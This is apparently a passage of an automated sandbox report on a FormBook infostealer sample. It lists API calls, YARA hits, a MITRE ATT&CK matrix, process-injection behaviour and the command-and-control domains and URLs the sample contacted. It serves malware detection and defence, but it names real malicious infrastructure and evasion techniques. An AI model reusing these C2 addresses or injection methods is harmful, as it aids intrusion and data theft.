          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00893CC7 _get_osfhandle,GetLocalTime,SetLocalTime,SetLocalTime,GetLastError,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087443C GetVersion,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts1 | Shared Modules1 | Valid Accounts1 | Valid Accounts1 | Masquerading1 | Input Capture1 | System Time Discovery1 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Access Token Manipulation1 | Valid Accounts1 | LSASS Memory | Security Software Discovery241 | Remote Desktop Protocol | Archive Collected Data11 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection712 | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools1 | NTDS | Virtualization/Sandbox Evasion31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion31 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection712 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Deobfuscate/Decode Files or Information11 | DCSync | System Information Discovery125 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information4 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing13 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

          Behavior Graph ID: 483640 | Sample: TPJX2QwEdXs5sTV.exe | Startdate: 15/09/2021 | Architecture: WINDOWS | Score: 100

          Start
            Contacted domains: www.fanpaixiu.xyz, www.438451.com
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
            TPJX2QwEdXs5sTV.exe (started)
              Dropped file: C:\Users\user\...\TPJX2QwEdXs5sTV.exe.log, ASCII
              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
              RegSvcs.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                cmd.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  cmd.exe (started)
                    conhost.exe (started)
                explorer.exe (injected)
                  Contacted: www.munortiete.com 172.67.147.111, ports 49810, 80, CLOUDFLARENETUS United States; www.pierrot-bros.com; 4 other IPs or domains
                  Signature: System process connects to network (likely due to code injection or exploit)
              RegSvcs.exe (started)
                Signature: Tries to detect virtualization through RDTSC time measurements


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          TPJX2QwEdXs5sTV.exe | 18% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.zhongyicts.com.cnue | 0% | URL Reputation | safe
          http://www.carterandcone.comTCd | 0% | Avira URL Cloud | safe
          http://www.carterandcone.comypoC | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.carterandcone.comak | 0% | Avira URL Cloud | safe
          http://www.carterandcone.com-se | 0% | Avira URL Cloud | safe
          http://www.carterandcone.com0 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn0 | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml-g | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.com | 0% | URL Reputation | safe
          http://www.carterandcone.com) | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.carterandcone.com? | 0% | Avira URL Cloud | safe
          http://www.zhongyicts.com.cncom | 0% | Avira URL Cloud | safe
          http://www.carterandcone.comue | 0% | URL Reputation | safe
          http://www.carterandcone.comMic | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.krV | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.carterandcone.como._ | 0% | Avira URL Cloud | safe
          http://www.indianadogeavaxsite.site/t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.carterandcone.coml-se | 0% | Avira URL Cloud | safe
          http://www.urwpp.de | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://fontfabrik.comj | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr-cY | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coma | 0% | URL Reputation | safe
          http://www.carterandcone.comexc | 0% | URL Reputation | safe
          http://www.tiro.comw | 0% | Avira URL Cloud | safe
          http://www.carterandcone.comd | 0% | URL Reputation | safe
          http://www.sajatypeworks.comt | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cno.U | 0% | Avira URL Cloud | safe
          http://www.urwpp.deA | 0% | Avira URL Cloud | safe
          http://www.zhongyicts.com.cno.E | 0% | Avira URL Cloud | safe
          http://en.w | 0% | URL Reputation | safe
          http://www.sakkal.com9 | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cnk | 0% | Avira URL Cloud | safe
          www.438451.com/t75f/ | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
          http://www.carterandcone.comof | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn0 | 0% | URL Reputation | safe
          http://www.sakkal.com3 | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cncom | 0% | Avira URL Cloud | safe
          http://www.monotype. | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV | 0% | Avira URL Cloud | safe
          http://www.carterandcone.comona | 0% | URL Reputation | safe
          http://www.ascendercorp.com/typedesigners.htmlh | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnicr | 0% | URL Reputation | safe
          http://www.goodfont.co.kX | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kra-e# | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn( | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.munortiete.com | 172.67.147.111 | true | true | - | unknown
www.438451.com | 160.202.170.147 | true | true | - | unknown
domains.readymag.com | 54.194.41.141 | true | false | - | high
www.fanpaixiu.xyz | unknown | unknown | true | - | unknown
www.ice-lemon.pro | unknown | unknown | true | - | unknown
www.pierrot-bros.com | unknown | unknown | true | - | unknown
www.indianadogeavaxsite.site | unknown | unknown | true | - | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.indianadogeavaxsite.site/t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn | true | Avira URL Cloud: safe | unknown
www.438451.com/t75f/ | true | Avira URL Cloud: safe | low

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersH | TPJX2QwEdXs5sTV.exe, 00000001.00000003.256499107.0000000006041000.00000004.00000001.sdmp | false | - | high
http://www.zhongyicts.com.cnue | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.comTCd | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.comypoC | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersD | TPJX2QwEdXs5sTV.exe, 00000001.00000003.259100620.000000000603B000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.comak | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252394694.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.com-se | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.com0 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.252797134.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn0 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml-g | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.257664415.0000000006041000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.257568508.0000000006041000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers0. | TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com) | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252313565.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.sajatypeworks.com | TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | TPJX2QwEdXs5sTV.exe, 00000001.00000003.262778713.000000000603B000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.260576945.000000000603B000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | TPJX2QwEdXs5sTV.exe, 00000001.00000003.246382239.000000000603B000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com? | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cncom | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comue | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comMic | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.krV | TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.como._ | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers/0 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.256690000.0000000006041000.00000004.00000001.sdmp | false | - | high
http://www.fonts.com | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml-se | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.de | TPJX2QwEdXs5sTV.exe, 00000001.00000003.259240750.0000000006047000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.256166829.0000000006041000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.comj | TPJX2QwEdXs5sTV.exe, 00000001.00000003.246270583.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr-cY | TPJX2QwEdXs5sTV.exe, 00000001.00000003.250685229.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000008.00000000.308790689.0000000006870000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.coma | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.comexc | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.tiro.comw | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comd | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252349501.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlo | TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmp | false | - | high
http://www.sajatypeworks.comt | TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cno.U | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deA | TPJX2QwEdXs5sTV.exe, 00000001.00000003.256226500.0000000006041000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cno.E | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://en.w | TPJX2QwEdXs5sTV.exe, 00000001.00000003.247036337.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com9 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.252434713.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cnk | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/ | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251510361.0000000006040000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comof | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn0 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | TPJX2QwEdXs5sTV.exe, 00000001.00000003.258314127.000000000605E000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000003.258167734.0000000006041000.00000004.00000001.sdmp; TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com3 | TPJX2QwEdXs5sTV.exe, 00000001.00000003.253704425.0000000006043000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.html | TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cncom | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.monotype. | TPJX2QwEdXs5sTV.exe, 00000001.00000003.260424917.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV | cmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comona | TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ascendercorp.com/typedesigners.htmlh | TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cnicr | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kX | TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kra-e# | TPJX2QwEdXs5sTV.exe, 00000001.00000003.250514753.000000000603B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/ | TPJX2QwEdXs5sTV.exe, 00000001.00000003.256412762.0000000006041000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn( | TPJX2QwEdXs5sTV.exe, 00000001.00000003.251297242.000000000603B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
